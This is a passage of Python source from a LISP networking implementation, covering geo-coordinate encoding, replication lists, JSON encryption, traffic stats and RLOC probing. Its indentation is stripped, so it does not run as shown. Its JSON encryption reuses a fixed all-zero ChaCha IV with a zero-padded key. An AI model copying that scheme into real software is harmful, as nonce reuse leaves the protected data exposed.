"&zoom={}&size=1024x1024&sensor=false").format(lat, lon, lat, lon,
zoom)
return(url)
#enddef
def print_geo_url(self):
geo = self.print_geo()
if (self.radius == 0):
url = self.geo_url()
string = "<a href='{}'>{}</a>".format(url, geo)
else:
url = geo.replace("/", "-")
string = "<a href='/lisp/geo-map/{}'>{}</a>".format(url, geo)
#endif
return(string)
#enddef
def dms_to_decimal(self):
degs, mins, secs = self.latitude, self.lat_mins, self.lat_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_lat = dd
degs, mins, secs = self.longitude, self.long_mins, self.long_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_long = dd
return((dd_lat, dd_long))
#enddef
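    #
    # A hedged worked example of dms_to_decimal() (values are illustrative):
    # an internal latitude of -37 (North), 24 minutes, 30 seconds becomes
    # 37 + (24 * 60 + 30) / 3600 = 37.4083 decimal degrees; the sign stays
    # positive because negative degrees mean North here.
    #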
def get_distance(self, geo_point):
dd_prefix = self.dms_to_decimal()
dd_point = geo_point.dms_to_decimal()
distance = geopy.distance.distance(dd_prefix, dd_point)
return(distance.km)
#enddef
def point_in_circle(self, geo_point):
km = self.get_distance(geo_point)
return(km <= self.radius)
#enddef
def encode_geo(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
geo_len = socket.htons(20 + 2)
flags = 0
lat = abs(self.latitude)
lat_ms = ((self.lat_mins * 60) + self.lat_secs) * 1000
if (self.latitude < 0): flags |= 0x40
lon = abs(self.longitude)
lon_ms = ((self.long_mins * 60) + self.long_secs) * 1000
if (self.longitude < 0): flags |= 0x20
alt = 0
if (self.no_geo_altitude() == False):
alt = socket.htonl(self.altitude)
flags |= 0x10
#endif
radius = socket.htons(self.radius)
if (radius != 0): flags |= 0x06
pkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_GEO_COORD_TYPE,
0, geo_len)
pkt += struct.pack("BBHBBHBBHIHHH", flags, 0, 0, lat, lat_ms >> 16,
socket.htons(lat_ms & 0x0ffff), lon, lon_ms >> 16,
socket.htons(lon_ms & 0xffff), alt, radius, 0, 0)
return(pkt)
#enddef
def decode_geo(self, packet, lcaf_len, radius_hi):
packet_format = "BBHBBHBBHIHHH"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
flags, r1, uncertainty, lat, lat_hi, lat_ms, lon, lon_hi, lon_ms, \
alt, radius, r2, afi = struct.unpack(packet_format,
packet[:format_size])
#
# No nested LCAFs in Geo-Coord type.
#
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
if (flags & 0x40): lat = -lat
self.latitude = lat
lat_secs = old_div(((lat_hi << 16) | socket.ntohs(lat_ms)), 1000)
self.lat_mins = old_div(lat_secs, 60)
self.lat_secs = lat_secs % 60
if (flags & 0x20): lon = -lon
self.longitude = lon
lon_secs = old_div(((lon_hi << 16) | socket.ntohs(lon_ms)), 1000)
self.long_mins = old_div(lon_secs, 60)
self.long_secs = lon_secs % 60
self.altitude = socket.ntohl(alt) if (flags & 0x10) else -1
radius = socket.ntohs(radius)
self.radius = radius if (flags & 0x02) else radius * 1000
self.geo_name = None
packet = packet[format_size::]
if (afi != 0):
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
return(packet)
#enddef
#endclass
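#
# The following is an illustrative sketch (not part of the original code and
# not called anywhere) of the degrees/minutes/seconds to decimal-degrees
# arithmetic that lisp_geo.dms_to_decimal() performs, written as a standalone
# function with the conventional sign handling (north/east positive). The
# function name and signature are examples only.
#
def lisp_example_dms_to_decimal(degrees, minutes, seconds, hemisphere):
    #
    # Decimal degrees are the whole degrees plus the minutes/seconds fraction.
    #
    dd = float(abs(degrees)) + float(minutes * 60 + seconds) / 3600
    #
    # South latitudes and west longitudes become negative decimal values.
    #
    if (hemisphere in ["S", "W"]): dd = -dd
    return(dd)
#enddef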
#
# Structure for Replication List Entries.
#
class lisp_rle_node(object):
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.level = 0
self.translated_port = 0
self.rloc_name = None
#enddef
def copy_rle_node(self):
rle_node = lisp_rle_node()
rle_node.address.copy_address(self.address)
rle_node.level = self.level
rle_node.translated_port = self.translated_port
rle_node.rloc_name = self.rloc_name
return(rle_node)
#enddef
def store_translated_rloc(self, rloc, port):
self.address.copy_address(rloc)
self.translated_port = port
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.address.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
#endclass
class lisp_rle(object):
def __init__(self, name):
self.rle_name = name
self.rle_nodes = []
self.rle_forwarding_list = []
#enddef
def copy_rle(self):
rle = lisp_rle(self.rle_name)
for rle_node in self.rle_nodes:
rle.rle_nodes.append(rle_node.copy_rle_node())
#endfor
rle.build_forwarding_list()
return(rle)
#enddef
def print_rle(self, html, do_formatting):
rle_str = ""
for rle_node in self.rle_nodes:
port = rle_node.translated_port
rle_name_str = ""
if (rle_node.rloc_name != None):
rle_name_str = rle_node.rloc_name
if (do_formatting): rle_name_str = blue(rle_name_str, html)
rle_name_str = "({})".format(rle_name_str)
#endif
addr_str = rle_node.address.print_address_no_iid()
if (rle_node.address.is_local()): addr_str = red(addr_str, html)
rle_str += "{}{}{}, ".format(addr_str, "" if port == 0 else \
":" + str(port), rle_name_str)
#endfor
return(rle_str[0:-2] if rle_str != "" else "")
#enddef
def build_forwarding_list(self):
level = -1
for rle_node in self.rle_nodes:
if (level == -1):
if (rle_node.address.is_local()): level = rle_node.level
else:
if (rle_node.level > level): break
#endif
#endfor
level = 0 if level == -1 else rle_node.level
self.rle_forwarding_list = []
for rle_node in self.rle_nodes:
if (rle_node.level == level or (level == 0 and
rle_node.level == 128)):
if (lisp_i_am_rtr == False and rle_node.address.is_local()):
addr_str = rle_node.address.print_address_no_iid()
lprint("Exclude local RLE RLOC {}".format(addr_str))
continue
#endif
self.rle_forwarding_list.append(rle_node)
#endif
#endfor
#enddef
#endclass
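#
# Illustrative sketch (not part of the original code) of the level-selection
# idea behind lisp_rle.build_forwarding_list(): a replicator forwards to the
# RLE nodes at the next level above its own, and a node that does not appear
# in the list forwards to level 0. The input here is a plain list of
# (level, is_local) tuples, an assumption made just for this simplified
# example; the real method walks lisp_rle_node objects.
#
def lisp_example_rle_target_level(levels_and_local_flags):
    local_level = -1
    for level, is_local in levels_and_local_flags:
        if (is_local):
            local_level = level
            break
        #endif
    #endfor
    if (local_level == -1): return(0)
    #
    # Pick the smallest level strictly greater than our own; if none exists,
    # stay at our own level.
    #
    higher = [l for l, f in levels_and_local_flags if l > local_level]
    return(min(higher) if higher else local_level)
#enddef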
class lisp_json(object):
def __init__(self, name, string, encrypted=False, ms_encrypt=False):
#
# Deal with py3.
#
if (type(string) == bytes): string = string.decode()
self.json_name = name
self.json_encrypted = False
try:
json.loads(string)
except:
lprint("Invalid JSON string: '{}'".format(string))
string = '{ "?" : "?" }'
#endtry
self.json_string = string
#
        # Decide to encrypt or decrypt. The map-server encrypts and stores
        # ciphertext in the mapping system. The lig client decrypts to show
        # user data if it has the key in the env variable LISP_JSON_KEY. The
        # format of the env variable is "<key>" or "[<key-id>]<key>".
        #
        # If the LISP site-eid is not configured to encrypt the JSON, then
        # store it in plaintext.
#
if (len(lisp_ms_json_keys) != 0):
if (ms_encrypt == False): return
self.json_key_id = list(lisp_ms_json_keys.keys())[0]
self.json_key = lisp_ms_json_keys[self.json_key_id]
self.encrypt_json()
#endif
if (lisp_log_id == "lig" and encrypted):
key = os.getenv("LISP_JSON_KEY")
if (key != None):
index = -1
if (key[0] == "[" and "]" in key):
index = key.find("]")
self.json_key_id = int(key[1:index])
#endif
self.json_key = key[index+1::]
#endif
self.decrypt_json()
#endif
#endif
#enddef
def add(self):
self.delete()
lisp_json_list[self.json_name] = self
#enddef
def delete(self):
if (self.json_name in lisp_json_list):
del(lisp_json_list[self.json_name])
lisp_json_list[self.json_name] = None
#endif
#enddef
def print_json(self, html):
good_string = self.json_string
bad = "***"
if (html): bad = red(bad, html)
bad_string = bad + self.json_string + bad
if (self.valid_json()): return(good_string)
return(bad_string)
#enddef
def valid_json(self):
try:
json.loads(self.json_string)
except:
return(False)
#endtry
return(True)
#enddef
def encrypt_json(self):
ekey = self.json_key.zfill(32)
iv = "0" * 8
jd = json.loads(self.json_string)
for key in jd:
value = jd[key]
if (type(value) != str): value = str(value)
value = chacha.ChaCha(ekey, iv).encrypt(value)
jd[key] = binascii.hexlify(value)
#endfor
self.json_string = json.dumps(jd)
self.json_encrypted = True
#enddef
def decrypt_json(self):
ekey = self.json_key.zfill(32)
iv = "0" * 8
jd = json.loads(self.json_string)
for key in jd:
value = binascii.unhexlify(jd[key])
jd[key] = chacha.ChaCha(ekey, iv).encrypt(value)
#endfor
try:
self.json_string = json.dumps(jd)
self.json_encrypted = False
except:
pass
#endtry
#enddef
#endclass
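#
# Illustrative sketch (not part of the original code) of the per-value
# transform lisp_json.encrypt_json() applies before storing a JSON string:
# each value is stringified, run through the cipher, and hex-encoded. The
# cipher step is stubbed out with a plain .encode() so the example is
# self-contained; the real code uses chacha.ChaCha(key, iv).encrypt(). The
# json and binascii modules are the ones this file already uses.
#
def lisp_example_hexlify_json_values(json_string):
    jd = json.loads(json_string)
    for key in jd:
        value = jd[key]
        if (type(value) != str): value = str(value)
        cipher_text = value.encode()
        jd[key] = binascii.hexlify(cipher_text).decode()
    #endfor
    return(json.dumps(jd))
#enddef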
#
# LISP forwarding stats info.
#
class lisp_stats(object):
def __init__(self):
self.packet_count = 0
self.byte_count = 0
self.last_rate_check = 0
self.last_packet_count = 0
self.last_byte_count = 0
self.last_increment = None
#enddef
def increment(self, octets):
self.packet_count += 1
self.byte_count += octets
self.last_increment = lisp_get_timestamp()
#enddef
def recent_packet_sec(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 1)
#enddef
def recent_packet_min(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 60)
#enddef
def stat_colors(self, c1, c2, html):
if (self.recent_packet_sec()):
return(green_last_sec(c1), green_last_sec(c2))
#endif
if (self.recent_packet_min()):
return(green_last_min(c1), green_last_min(c2))
#endif
return(c1, c2)
#enddef
def normalize(self, count):
count = str(count)
digits = len(count)
if (digits > 12):
            count = count[0:-12] + "." + count[-12:-9] + "T"
return(count)
#endif
if (digits > 9):
count = count[0:-9] + "." + count[-9:-7] + "B"
return(count)
#endif
if (digits > 6):
count = count[0:-6] + "." + count[-6] + "M"
return(count)
#endif
return(count)
#enddef
def get_stats(self, summary, html):
last_rate = self.last_rate_check
last_packets = self.last_packet_count
last_bytes = self.last_byte_count
self.last_rate_check = lisp_get_timestamp()
self.last_packet_count = self.packet_count
self.last_byte_count = self.byte_count
rate_diff = self.last_rate_check - last_rate
if (rate_diff == 0):
packet_rate = 0
bit_rate = 0
else:
packet_rate = int(old_div((self.packet_count - last_packets),
rate_diff))
bit_rate = old_div((self.byte_count - last_bytes), rate_diff)
bit_rate = old_div((bit_rate * 8), 1000000)
bit_rate = round(bit_rate, 2)
#endif
#
# Normalize and put in string form.
#
packets = self.normalize(self.packet_count)
bc = self.normalize(self.byte_count)
#
        # The summary version combines the two: the normalized counts above
        # become the title string and the packet/bit rates become the stats
        # string handed to lisp_span() for the pull-down html menu.
#
if (summary):
h = "<br>" if html else ""
packets, bc = self.stat_colors(packets, bc, html)
title = "packet-count: {}{}byte-count: {}".format(packets, h, bc)
stats = "packet-rate: {} pps\nbit-rate: {} Mbps".format( \
packet_rate, bit_rate)
if (html != ""): stats = lisp_span(title, stats)
else:
prate = str(packet_rate)
brate = str(bit_rate)
if (html):
packets = lisp_print_cour(packets)
prate = lisp_print_cour(prate)
bc = lisp_print_cour(bc)
brate = lisp_print_cour(brate)
#endif
h = "<br>" if html else ", "
stats = ("packet-count: {}{}packet-rate: {} pps{}byte-count: " + \
"{}{}bit-rate: {} mbps").format(packets, h, prate, h, bc, h,
brate)
#endif
return(stats)
#enddef
#endclass
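#
# Illustrative sketch (not part of the original code) of the rate arithmetic
# in lisp_stats.get_stats(): packet and bit rates are the deltas since the
# last check divided by the elapsed time, with the bit rate scaled to
# megabits per second. Function and argument names are examples only.
#
def lisp_example_compute_rates(packet_delta, byte_delta, elapsed_secs):
    if (elapsed_secs == 0): return(0, 0)
    packet_rate = int(packet_delta / elapsed_secs)
    bit_rate = round((byte_delta * 8) / (elapsed_secs * 1000000.0), 2)
    return(packet_rate, bit_rate)
#enddef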
#
# ETR/RTR decapsulation total packet and error stats. Any time a new
# lisp_packet.packet_error value is added, a matching key string must be
# added to this dictionary.
#
lisp_decap_stats = {
"good-packets" : lisp_stats(), "ICV-error" : lisp_stats(),
"checksum-error" : lisp_stats(), "lisp-header-error" : lisp_stats(),
"no-decrypt-key" : lisp_stats(), "bad-inner-version" : lisp_stats(),
"outer-header-error" : lisp_stats()
}
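#
# Example usage sketch (not part of the original code): how a decapsulation
# path might bump one of the counters above. The packet_error string is
# assumed to be either "" for a good packet or one of the keys in
# lisp_decap_stats; the helper name is hypothetical.
#
def lisp_example_count_decap(packet_error, packet_length):
    key = "good-packets" if (packet_error == "") else packet_error
    if (key in lisp_decap_stats):
        lisp_decap_stats[key].increment(packet_length)
    #endif
#enddef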
#
# This is a locator record definition as defined in the LISP RFCs.
#
class lisp_rloc(object):
def __init__(self, recurse=True):
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_name = None
self.interface = None
self.translated_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.translated_port = 0
self.priority = 255
self.weight = 0
self.mpriority = 255
self.mweight = 0
self.uptime = lisp_get_timestamp()
self.state = LISP_RLOC_UP_STATE
self.last_state_change = None
self.rle_name = None
self.elp_name = None
self.geo_name = None
self.json_name = None
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.stats = lisp_stats()
self.last_rloc_probe = None
self.last_rloc_probe_reply = None
self.rloc_probe_rtt = -1
self.recent_rloc_probe_rtts = [-1, -1, -1]
self.rloc_probe_hops = "?/?"
self.recent_rloc_probe_hops = ["?/?", "?/?", "?/?"]
self.rloc_probe_latency = "?/?"
self.recent_rloc_probe_latencies = ["?/?", "?/?", "?/?"]
self.last_rloc_probe_nonce = 0
self.echo_nonce_capable = False
self.map_notify_requested = False
self.rloc_next_hop = None
self.next_rloc = None
self.multicast_rloc_probe_list = {}
if (recurse == False): return
#
# This is for a box with multiple egress interfaces. We create an
        # rloc chain, one for each <device, nh> tuple, so each one can be
        # RLOC-probed individually.
#
next_hops = lisp_get_default_route_next_hops()
if (next_hops == [] or len(next_hops) == 1): return
self.rloc_next_hop = next_hops[0]
last = self
for nh in next_hops[1::]:
            hop = copy.deepcopy(self)
hop.rloc_next_hop = nh
last.next_rloc = hop
last = hop
#endfor
#enddef
def up_state(self):
return(self.state == LISP_RLOC_UP_STATE)
#enddef
def unreach_state(self):
return(self.state == LISP_RLOC_UNREACH_STATE)
#enddef
def no_echoed_nonce_state(self):
return(self.state == LISP_RLOC_NO_ECHOED_NONCE_STATE)
#enddef
def down_state(self):
return(self.state in \
[LISP_RLOC_DOWN_STATE, LISP_RLOC_ADMIN_DOWN_STATE])
#enddef
def print_state(self):
if (self.state is LISP_RLOC_UNKNOWN_STATE):
return("unknown-state")
if (self.state is LISP_RLOC_UP_STATE):
return("up-state")
if (self.state is LISP_RLOC_DOWN_STATE):
return("down-state")
if (self.state is LISP_RLOC_ADMIN_DOWN_STATE):
return("admin-down-state")
if (self.state is LISP_RLOC_UNREACH_STATE):
return("unreach-state")
if (self.state is LISP_RLOC_NO_ECHOED_NONCE_STATE):
return("no-echoed-nonce-state")
return("invalid-state")
#enddef
def print_rloc(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}rloc {}, uptime {}, {}, parms {}/{}/{}/{}".format(indent,
red(self.rloc.print_address(), False), ts, self.print_state(),
self.priority, self.weight, self.mpriority, self.mweight))
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def store_rloc_from_record(self, rloc_record, nonce, source):
port = LISP_DATA_PORT
self.rloc.copy_address(rloc_record.rloc)
if (rloc_record.rloc_name != None):
self.rloc_name = rloc_record.rloc_name
#endif
#
# Store translated port if RLOC was translated by a NAT.
#
rloc = self.rloc
if (rloc.is_null() == False):
nat_info = lisp_get_nat_info(rloc, self.rloc_name)
if (nat_info):
port = nat_info.port
head = lisp_nat_state_info[self.rloc_name][0]
addr_str = rloc.print_address_no_iid()
rloc_str = red(addr_str, False)
rloc_nstr = "" if self.rloc_name == None else \
blue(self.rloc_name, False)
#
# Don't use timed-out state. And check if the RLOC from the
                # RLOC-record is different from the youngest NAT state.
#
if (nat_info.timed_out()):
lprint((" Matched stored NAT state timed out for " + \
"RLOC {}:{}, {}").format(rloc_str, port, rloc_nstr))
nat_info = None if (nat_info == head) else head
if (nat_info and nat_info.timed_out()):
port = nat_info.port
rloc_str = red(nat_info.address, False)
lprint((" Youngest stored NAT state timed out " + \
" for RLOC {}:{}, {}").format(rloc_str, port,
rloc_nstr))
nat_info = None
#endif
#endif
#
                # Check to see if the RLOC for the map-cache is the same
                # RLOC as in the NAT state info.
#
if (nat_info):
if (nat_info.address != addr_str):
lprint("RLOC conflict, RLOC-record {}, NAT state {}". \
format(rloc_str, red(nat_info.address, False)))
self.rloc.store_address(nat_info.address)
#endif
rloc_str = red(nat_info.address, False)
port = nat_info.port
lprint(" Use NAT translated RLOC {}:{} for {}". \
format(rloc_str, port, rloc_nstr))
self.store_translated_rloc(rloc, port)
#endif
#endif
#endif
self.geo = rloc_record.geo
self.elp = rloc_record.elp
self.json = rloc_record.json
#
# RLE nodes may be behind NATs too.
#
self.rle = rloc_record.rle
if (self.rle):
for rle_node in self.rle.rle_nodes:
rloc_name = rle_node.rloc_name
nat_info = lisp_get_nat_info(rle_node.address, rloc_name)
if (nat_info == None): continue
port = nat_info.port
rloc_name_str = rloc_name
if (rloc_name_str): rloc_name_str = blue(rloc_name, False)
lprint((" Store translated encap-port {} for RLE-" + \
"node {}, rloc-name '{}'").format(port,
rle_node.address.print_address_no_iid(), rloc_name_str))
rle_node.translated_port = port
#endfor
#endif
self.priority = rloc_record.priority
self.mpriority = rloc_record.mpriority
self.weight = rloc_record.weight
self.mweight = rloc_record.mweight
if (rloc_record.reach_bit and rloc_record.local_bit and
rloc_record.probe_bit == False):
if (self.state != LISP_RLOC_UP_STATE):
self.last_state_change = lisp_get_timestamp()
#endif
self.state = LISP_RLOC_UP_STATE
#endif
#
# Store keys in RLOC lisp-crypto data structure.
#
rloc_is_source = source.is_exact_match(rloc_record.rloc) if \
source != None else None
if (rloc_record.keys != None and rloc_is_source):
key = rloc_record.keys[1]
if (key != None):
addr_str = rloc_record.rloc.print_address_no_iid() + ":" + \
str(port)
key.add_key_by_rloc(addr_str, True)
lprint(" Store encap-keys for nonce 0x{}, RLOC {}".format( \
lisp_hex_string(nonce), red(addr_str, False)))
#endif
#endif
return(port)
#enddef
def store_translated_rloc(self, rloc, port):
self.rloc.copy_address(rloc)
self.translated_rloc.copy_address(rloc)
self.translated_port = port
#enddef
def is_rloc_translated(self):
return(self.translated_rloc.is_null() == False)
#enddef
def rloc_exists(self):
if (self.rloc.is_null() == False): return(True)
if (self.rle_name or self.geo_name or self.elp_name or self.json_name):
return(False)
#endif
return(True)
#enddef
def is_rtr(self):
return((self.priority == 254 and self.mpriority == 255 and \
self.weight == 0 and self.mweight == 0))
#enddef
def print_state_change(self, new_state):
current_state = self.print_state()
string = "{} -> {}".format(current_state, new_state)
if (new_state == "up" and self.unreach_state()):
string = bold(string, False)
#endif
return(string)
#enddef
def print_rloc_probe_rtt(self):
if (self.rloc_probe_rtt == -1): return("none")
return(self.rloc_probe_rtt)
#enddef
def print_recent_rloc_probe_rtts(self):
rtts = str(self.recent_rloc_probe_rtts)
rtts = rtts.replace("-1", "?")
return(rtts)
#enddef
def compute_rloc_probe_rtt(self):
last = self.rloc_probe_rtt
self.rloc_probe_rtt = -1
if (self.last_rloc_probe_reply == None): return
if (self.last_rloc_probe == None): return
self.rloc_probe_rtt = self.last_rloc_probe_reply - self.last_rloc_probe
self.rloc_probe_rtt = round(self.rloc_probe_rtt, 3)
last_list = self.recent_rloc_probe_rtts
self.recent_rloc_probe_rtts = [last] + last_list[0:-1]
#enddef
def print_rloc_probe_hops(self):
return(self.rloc_probe_hops)
#enddef
def print_recent_rloc_probe_hops(self):
hops = str(self.recent_rloc_probe_hops)
return(hops)
#enddef
def store_rloc_probe_hops(self, to_hops, from_ttl):
if (to_hops == 0):
to_hops = "?"
elif (to_hops < old_div(LISP_RLOC_PROBE_TTL, 2)):
to_hops = "!"
else:
to_hops = str(LISP_RLOC_PROBE_TTL - to_hops)
#endif
if (from_ttl < old_div(LISP_RLOC_PROBE_TTL, 2)):
from_hops = "!"
else:
from_hops = str(LISP_RLOC_PROBE_TTL - from_ttl)
#endif
last = self.rloc_probe_hops
self.rloc_probe_hops = to_hops + "/" + from_hops
last_list = self.recent_rloc_probe_hops
self.recent_rloc_probe_hops = [last] + last_list[0:-1]
#enddef
def store_rloc_probe_latencies(self, json_telemetry):
tel = lisp_decode_telemetry(json_telemetry)
fl = round(float(tel["etr-in"]) - float(tel["itr-out"]), 3)
rl = round(float(tel["itr-in"]) - float(tel["etr-out"]), 3)
last = self.rloc_probe_latency
self.rloc_probe_latency = str(fl) + "/" + str(rl)
last_list = self.recent_rloc_probe_latencies
self.recent_rloc_probe_latencies = [last] + last_list[0:-1]
#enddef
def print_rloc_probe_latency(self):
return(self.rloc_probe_latency)
#enddef
def print_recent_rloc_probe_latencies(self):
latencies = str(self.recent_rloc_probe_latencies)
return(latencies)
#enddef
def process_rloc_probe_reply(self, ts, nonce, eid, group, hc, ttl, jt):
rloc = self
while (True):
if (rloc.last_rloc_probe_nonce == nonce): break
rloc = rloc.next_rloc
if (rloc == None):
lprint(" No matching nonce state found for nonce 0x{}". \
format(lisp_hex_string(nonce)))
return
#endif
#endwhile
#
# Compute RTTs.
#
rloc.last_rloc_probe_reply = ts
rloc.compute_rloc_probe_rtt()
state_string = rloc.print_state_change("up")
if (rloc.state != LISP_RLOC_UP_STATE):
lisp_update_rtr_updown(rloc.rloc, True)
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
mc = lisp_map_cache.lookup_cache(eid, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endif
#
# Store hops.
#
rloc.store_rloc_probe_hops(hc, ttl)
#
        # Store one-way latency if telemetry JSON data is present in the
        # Map-Reply.
#
if (jt): rloc.store_rloc_probe_latencies(jt)
probe = bold("RLOC-probe reply", False)
addr_str = rloc.rloc.print_address_no_iid()
rtt = bold(str(rloc.print_rloc_probe_rtt()), False)
p = ":{}".format(self.translated_port) if self.translated_port != 0 \
else ""
nh = ""
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
nh = ", nh {}({})".format(n, d)
#endif
lat = bold(rloc.print_rloc_probe_latency(), False)
lat = ", latency {}".format(lat) if jt else ""
e = green(lisp_print_eid_tuple(eid, group), False)
lprint((" Received {} from {}{} for {}, {}, rtt {}{}, " + \
"to-ttl/from-ttl {}{}").format(probe, red(addr_str, False), p, e,
state_string, rtt, nh, str(hc) + "/" + str(ttl), lat))
if (rloc.rloc_next_hop == None): return
#
# Now select better RTT next-hop.
#
rloc = None
install = None
while (True):
rloc = self if rloc == None else rloc.next_rloc
if (rloc == None): break
if (rloc.up_state() == False): continue
if (rloc.rloc_probe_rtt == -1): continue
if (install == None): install = rloc
if (rloc.rloc_probe_rtt < install.rloc_probe_rtt): install = rloc
#endwhile
if (install != None):
d, n = install.rloc_next_hop
nh = bold("nh {}({})".format(n, d), False)
lprint(" Install host-route via best {}".format(nh))
lisp_install_host_route(addr_str, None, False)
lisp_install_host_route(addr_str, n, True)
#endif
#enddef
def add_to_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (addr_str not in lisp_rloc_probe_list):
lisp_rloc_probe_list[addr_str] = []
#endif
if (group.is_null()): group.instance_id = 0
for r, e, g in lisp_rloc_probe_list[addr_str]:
if (e.is_exact_match(eid) and g.is_exact_match(group)):
if (r == self):
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
return
#endif
lisp_rloc_probe_list[addr_str].remove([r, e, g])
break
#endif
#endfor
lisp_rloc_probe_list[addr_str].append([self, eid, group])
#
# Copy reach/unreach state from first RLOC that the active RLOC-probing
# is run on.
#
rloc = lisp_rloc_probe_list[addr_str][0][0]
if (rloc.state == LISP_RLOC_UNREACH_STATE):
self.state = LISP_RLOC_UNREACH_STATE
self.last_state_change = lisp_get_timestamp()
#endif
#enddef
def delete_from_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (addr_str not in lisp_rloc_probe_list): return
array = []
for entry in lisp_rloc_probe_list[addr_str]:
if (entry[0] != self): continue
if (entry[1].is_exact_match(eid) == False): continue
if (entry[2].is_exact_match(group) == False): continue
array = entry
break
#endfor
if (array == []): return
try:
lisp_rloc_probe_list[addr_str].remove(array)
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
except:
return
#endtry
#enddef
def print_rloc_probe_state(self, trailing_linefeed):
output = ""
rloc = self
while (True):
sent = rloc.last_rloc_probe
if (sent == None): sent = 0
resp = rloc.last_rloc_probe_reply
if (resp == None): resp = 0
rtt = rloc.print_rloc_probe_rtt()
s = space(4)
if (rloc.rloc_next_hop == None):
output += "RLOC-Probing:\n"
else:
d, n = rloc.rloc_next_hop
output += "RLOC-Probing for nh {}({}):\n".format(n, d)
#endif
output += ("{}RLOC-probe request sent: {}\n{}RLOC-probe reply " + \
"received: {}, rtt {}").format(s, lisp_print_elapsed(sent),
s, lisp_print_elapsed(resp), rtt)
if (trailing_linefeed): output += "\n"
rloc = rloc.next_rloc
if (rloc == None): break
output += "\n"
#endwhile
return(output)
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
def rloc_recent_rekey(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
key = lisp_crypto_keys_by_rloc_encap[addr_str][1]
if (key == None): return(False)
if (key.last_rekey == None): return(True)
return(time.time() - key.last_rekey < 1)
except:
return(False)
#endtry
#enddef
#endclass
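#
# Illustrative sketch (not part of the original code) of the fixed-length
# history bookkeeping lisp_rloc uses for recent RTTs, hop counts, and
# latencies: the previous value is pushed onto the front of the list and the
# oldest entry falls off the end, so the list length stays constant. For
# example, lisp_example_push_history([-1, -1, -1], 0.25) returns
# [0.25, -1, -1]. The function name is an example only.
#
def lisp_example_push_history(history_list, previous_value):
    return([previous_value] + history_list[0:-1])
#enddef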
class lisp_mapping(object):
def __init__(self, eid, group, rloc_set):
self.eid = eid
if (eid == ""): self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = group
if (group == ""): self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_set = rloc_set
self.best_rloc_set = []
self.build_best_rloc_set()
self.uptime = lisp_get_timestamp()
self.action = LISP_NO_ACTION
self.expires = None
self.map_cache_ttl = None
self.register_ttl = LISP_REGISTER_TTL
self.last_refresh_time = self.uptime
self.source_cache = None
self.map_replies_sent = 0
self.mapping_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.use_mr_name = "all"
self.use_ms_name = "all"
self.stats = lisp_stats()
self.dynamic_eids = None
self.checkpoint_entry = False
self.secondary_iid = None
self.signature_eid = False
self.gleaned = False
self.recent_sources = {}
self.last_multicast_map_request = 0
self.subscribed_eid = None
self.subscribed_group = None
#enddef
def print_mapping(self, eid_indent, rloc_indent):
ts = lisp_print_elapsed(self.uptime)
group = "" if self.group.is_null() else \
", group {}".format(self.group.print_prefix())
lprint("{}eid {}{}, uptime {}, {} rlocs:".format(eid_indent,
green(self.eid.print_prefix(), False), group, ts,
len(self.rloc_set)))
for rloc in self.rloc_set: rloc.print_rloc(rloc_indent)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.map_cache_ttl
if (ttl == None): return("forever")
if (ttl >= 3600):
if ((ttl % 3600) == 0):
ttl = str(old_div(ttl, 3600)) + " hours"
else:
                ttl = str(old_div(ttl, 60)) + " mins"
#endif
elif (ttl >= 60):
if ((ttl % 60) == 0):
ttl = str(old_div(ttl, 60)) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def refresh(self):
if (self.group.is_null()): return(self.refresh_unicast())
return(self.refresh_multicast())
#enddef
def refresh_unicast(self):
return(self.is_active() and self.has_ttl_elapsed() and
self.gleaned == False)
#enddef
def refresh_multicast(self):
#
